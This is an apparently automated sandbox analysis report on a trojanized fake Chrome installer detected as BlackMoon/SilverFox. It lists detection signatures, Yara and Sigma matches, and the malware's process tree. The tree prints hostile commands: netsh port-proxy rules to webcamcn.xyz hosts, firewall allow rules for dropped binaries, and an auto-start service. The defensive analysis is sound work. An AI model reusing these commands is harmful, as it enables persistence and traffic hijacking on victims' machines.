Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sutup-Chrome.13.26.x64.msi

Overview

General Information

Sample name:sutup-Chrome.13.26.x64.msi
Analysis ID:1432094
MD5:86561e111e7ce97e13a9936b9b4ba849
SHA1:61cd40da9253a367e416c9ab67e73738f18948c3
SHA256:bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88
Tags:msiSilverFox
Infos:

Detection

BlackMoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected BlackMoon Ransomware
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for dropped file
Modifies the windows firewall
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Tries to evade analysis by execution special instruction (VM detection)
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 4408 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7084 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6052 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • LetsPRO.exe (PID: 4320 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 4564 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6640 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 1976 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6340 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5520 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6048 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 4912 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 2128 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5480 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5476 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 5440 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • ChromeSetup.exe (PID: 4760 cmdline: "C:\Program Files (x86)\ChromeSetup.exe" MD5: 8884A9547AA410B697EFAD097F2B0013)
      • GoogleUpdate.exe (PID: 7324 cmdline: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" MD5: BAF0B64AF9FCEAB44942506F3AF21C87)
    • LetsPRO.exe (PID: 412 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 6408 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 3664 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5596 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 5144 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7284 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7180 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7268 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7192 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7224 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
    • LetsPRO.exe (PID: 7200 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
      • LetsPRO.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
  • LetsPRO.exe (PID: 4612 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" MD5: 7BB188DFEE179CBDE884A0E7D127B074)
    • LetsPRO.exe (PID: 7380 cmdline: "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: A5FC151170B4BEF53A2918729AA6D3A9)
  • cscript.exe (PID: 7752 cmdline: cscript C:\Users\user\99944\144977.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
  • cmd.exe (PID: 7800 cmdline: cmd /c cscript C:\Users\user\99944\144977.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cscript.exe (PID: 7816 cmdline: cscript C:\Users\user\99944\144977.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7916 cmdline: powershell.exe cscript C:\Users\user\99944\144977.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
  • sc.exe (PID: 7992 cmdline: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • netsh.exe (PID: 8012 cmdline: netsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=443 MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8048 cmdline: netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8080 cmdline: netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8108 cmdline: netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8136 cmdline: netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe" MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • netsh.exe (PID: 8164 cmdline: netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80 MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • taskkill.exe (PID: 7088 cmdline: taskkill /f /t /im wegame.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • taskkill.exe (PID: 380 cmdline: taskkill /f /t /im WeGame.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
KrBanker, BlackMoonThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2139779498.0000000010020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
    00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
      0000000F.00000002.2125913800.0000000010020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
        0000001F.00000002.2207790099.0000000010020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
          0000001A.00000002.2139832943.0000000010020000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.LetsPRO.exe.1003c7a7.2.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
              5.2.LetsPRO.exe.1003c7a7.2.raw.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
              • 0x1c631:$s1: blackmoon
              • 0x1c671:$s2: BlackMoon RunTime Error:
              14.2.LetsPRO.exe.10020253.2.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                14.2.LetsPRO.exe.10020253.2.raw.unpackMALWARE_Win_BlackMoonDetects executables using BlackMoon RunTimeditekSHen
                • 0x38b85:$s1: blackmoon
                • 0x38bc5:$s2: BlackMoon RunTime Error:
                5.2.LetsPRO.exe.10020253.3.raw.unpackJoeSecurity_blackmoonYara detected BlackMoon RansomwareJoe Security
                  Click to see the 47 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript C:\Users\user\99944\144977.vbs, CommandLine: cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: cscript C:\Users\user\99944\144977.vbs, ProcessId: 7752, ProcessName: cscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: cscript C:\Users\user\99944\144977.vbs, CommandLine: cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: cscript C:\Users\user\99944\144977.vbs, ProcessId: 7752, ProcessName: cscript.exe
                  Sigma detected: New Service Creation Using Sc.EXE
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, CommandLine: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: sc create 144977144 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 144977144, ProcessId: 7992, ProcessName: sc.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe cscript C:\Users\user\99944\144977.vbs, CommandLine: powershell.exe cscript C:\Users\user\99944\144977.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: powershell.exe cscript C:\Users\user\99944\144977.vbs, ProcessId: 7916, ProcessName: powershell.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeAvira: detection malicious, Label: HEUR/AGEN.1362051
                  Multi AV Scanner detection for dropped file
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeVirustotal: Detection: 16%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD5AE04 CryptHashCertificate,30_2_6CD5AE04
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD37604 CryptUnprotectData,GetLastError,LocalFree,30_2_6CD37604
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD5B004 CryptQueryObject,CertFindCertificateInStore,CertFindCertificateInStore,CertCloseStore,30_2_6CD5B004
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCD8ED8 CryptProtectData,LocalFree,30_2_6CCD8ED8
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD59D9B CryptHashData,30_2_6CD59D9B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC1DA5 CryptAcquireContextW,GetLastError,CryptReleaseContext,30_2_6CDC1DA5
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD59E01 CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,30_2_6CD59E01
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCDD933 CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,30_2_6CCDD933
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CD59BDC CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptCreateHash,30_2_6CD59BDC
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dllJump to behavior
                  Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
                  Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
                  Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
                  Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
